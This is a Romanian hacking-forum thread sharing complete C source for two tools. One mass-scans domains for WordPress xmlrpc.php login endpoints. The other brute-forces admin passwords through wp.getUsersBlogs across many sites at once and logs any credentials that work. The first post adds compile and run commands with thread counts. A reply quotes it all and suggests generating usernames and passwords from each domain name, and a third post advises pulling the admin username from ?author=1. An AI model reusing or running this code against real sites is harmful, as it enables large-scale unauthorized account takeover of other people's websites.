Jump to content
sssmoke

[RST] Wordpress xmlrpc.php Brute

Recommended Posts

Posted

Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php.

===== brute.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

void usage(char *s) {
printf(RED"ELITE WP BruteF0rce");
printf(GREEN"\n"GREEN);
printf("Smoke w33d everyday;)\n"NORMAL);
printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s);
exit(EXIT_SUCCESS);
}

int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) {
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

char buffer[2048], postvar[1024], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>");
strcat(postvar, pass);
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

bzero(buffer,2048);
n = read(sockfd,buffer,2047);

if (n < 0) {
exit(1);
}

if(strstr(buffer, "isAdmin")) {
printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass);
outfile = fopen("wp.log", "a+");
fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass);
fclose(outfile);
}

close(sockfd);
return 0;
}
int main(int argc, char *argv[]) {
char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000];
processed[0]=0;
time_t start;
if (argc < 5) usage(argv[0]);
printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}
fclose(ipfile);

if(!(userfile = fopen(argv[2], "r"))) {
printf("INVALID USERS FILE: %s\n", argv[2]);
exit(0);
}
fclose(userfile);

if(!(passfile = fopen(argv[3], "r"))) {
printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
exit(0);
}
fclose(passfile);

if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+");
fclose(badfile);

if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+");
fclose(badfile);

userfile = fopen(argv[2], "r");
while(1) {
if(!fgets((char *)&user, sizeof(user), userfile)) break;
if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0';
if (user) {
passfile = fopen(argv[3], "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass) {
badfile = fopen("wp.log", "r");
strcpy(processed, "");
while (1) {
if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break;
strcat(processed, invtmp);
}
fclose(badfile);
ipfile = fopen(argv[1], "r");
while (1) {
if(!fgets((char *)&tok, sizeof(tok), ipfile)) break;
if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0';
if (tok) {
char ip2[256], pass2[256];
ip = strtok(tok, " ");
link = strtok(NULL, " ");
strcpy(ip2, ip);
strcpy(pass2, pass);
if(strstr(pass2, "DOMAIN%")) {
if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0';
if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0';
if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0';
if(strstr(ip2, "www.")) {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=4;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}

else {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=0;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}
}

if(!strstr(processed, ip)) {
if(!(fork())) {
getvuln(ip,user,pass2,outfile,link);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL);
}
}
}
}
fclose(ipfile);
}
}
fclose(passfile);
}
}
fclose(userfile);

printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

===== checker.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *link, FILE *outfile);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

void usage(char *s) {
printf(RED"ELITE SMTP BruteF0rce");
printf(GREEN"\n"GREEN);
printf("Smoke w33d everyday;)\n"NORMAL);
printf("Usage: %s <IPs file> <threads>\n", s);
exit(EXIT_SUCCESS);
}

int getvuln(char *victim, char *link, FILE *outfile) {
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

char buffer[2048], postvar[2048], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55");
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

bzero(buffer,2048);
n = read(sockfd, buffer, 2047);

if (n < 0) {
exit(1);
}

if(strstr(buffer, "<int>403</int>")) {
printf("[+]Found: %s - %s\n", victim, link);
fprintf(outfile, "%s %s\n", victim, link);
}

close(sockfd);
return 0;
}
int main(int argc, char *argv[]) {
char ip[1024];

time_t start;
if (argc < 2) usage(argv[0]);
outfile = fopen("out.log", "a+");
printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}

while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0';
if (ip) {
if(!(fork())) {
getvuln(ip,"/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
if(!(fork())) {
getvuln(ip,"/blog/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
}
}
fclose(ipfile);

printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

Pentru compilare:

gcc -o checker checker.c

gcc -o brute brute.c

Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log.

Usage: ./checker <IPs file> <threads>

Pentru a incepe brute faceti o lista de useri, una de parole si porniti:

./brute out.log users.txt passwords.txt <threads>

Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400.

Astept sugestii :)

  • Upvote 1
Posted
Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php.

===== brute.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

void usage(char *s) {
printf(RED"ELITE WP BruteF0rce");
printf(GREEN"\n"GREEN);
printf("Smoke w33d everyday;)\n"NORMAL);
printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s);
exit(EXIT_SUCCESS);
}

int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) {
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

char buffer[2048], postvar[1024], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>");
strcat(postvar, pass);
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

bzero(buffer,2048);
n = read(sockfd,buffer,2047);

if (n < 0) {
exit(1);
}

if(strstr(buffer, "isAdmin")) {
printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass);
outfile = fopen("wp.log", "a+");
fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass);
fclose(outfile);
}

close(sockfd);
return 0;
}
int main(int argc, char *argv[]) {
char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000];
processed[0]=0;
time_t start;
if (argc < 5) usage(argv[0]);
printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}
fclose(ipfile);

if(!(userfile = fopen(argv[2], "r"))) {
printf("INVALID USERS FILE: %s\n", argv[2]);
exit(0);
}
fclose(userfile);

if(!(passfile = fopen(argv[3], "r"))) {
printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
exit(0);
}
fclose(passfile);

if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+");
fclose(badfile);

if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+");
fclose(badfile);

userfile = fopen(argv[2], "r");
while(1) {
if(!fgets((char *)&user, sizeof(user), userfile)) break;
if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0';
if (user) {
passfile = fopen(argv[3], "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass) {
badfile = fopen("wp.log", "r");
strcpy(processed, "");
while (1) {
if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break;
strcat(processed, invtmp);
}
fclose(badfile);
ipfile = fopen(argv[1], "r");
while (1) {
if(!fgets((char *)&tok, sizeof(tok), ipfile)) break;
if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0';
if (tok) {
char ip2[256], pass2[256];
ip = strtok(tok, " ");
link = strtok(NULL, " ");
strcpy(ip2, ip);
strcpy(pass2, pass);
if(strstr(pass2, "DOMAIN%")) {
if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0';
if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0';
if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0';
if(strstr(ip2, "www.")) {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=4;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}

else {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=0;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}
}

if(!strstr(processed, ip)) {
if(!(fork())) {
getvuln(ip,user,pass2,outfile,link);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL);
}
}
}
}
fclose(ipfile);
}
}
fclose(passfile);
}
}
fclose(userfile);

printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

===== checker.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *link, FILE *outfile);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

void usage(char *s) {
printf(RED"ELITE SMTP BruteF0rce");
printf(GREEN"\n"GREEN);
printf("Smoke w33d everyday;)\n"NORMAL);
printf("Usage: %s <IPs file> <threads>\n", s);
exit(EXIT_SUCCESS);
}

int getvuln(char *victim, char *link, FILE *outfile) {
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

char buffer[2048], postvar[2048], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55");
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

bzero(buffer,2048);
n = read(sockfd, buffer, 2047);

if (n < 0) {
exit(1);
}

if(strstr(buffer, "<int>403</int>")) {
printf("[+]Found: %s - %s\n", victim, link);
fprintf(outfile, "%s %s\n", victim, link);
}

close(sockfd);
return 0;
}
int main(int argc, char *argv[]) {
char ip[1024];

time_t start;
if (argc < 2) usage(argv[0]);
outfile = fopen("out.log", "a+");
printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}

while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0';
if (ip) {
if(!(fork())) {
getvuln(ip,"/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
if(!(fork())) {
getvuln(ip,"/blog/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
}
}
fclose(ipfile);

printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

Pentru compilare:

gcc -o checker checker.c

gcc -o brute brute.c

Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log.

Usage: ./checker <IPs file> <threads>

Pentru a incepe brute faceti o lista de useri, una de parole si porniti:

./brute out.log users.txt passwords.txt <threads>

Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400.

Astept sugestii :)

Sugestii:

Adauga-i functie de userfile inteligent adica poti sa extragi din domeniu diferite variante de usere, probabil cele mai uzuale ar fi primele 4 caractere din domeniu,primele 6 caractere din domeniu, primele 8 caractere din domeniu, tot domeniul fara tld, domeniul cu tld. Combinatiile sunt nenumarate, acelasi lucru poti sa il implementezi si la parole, asta va face scannerul tau diferit fata de altele.

Posted

La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...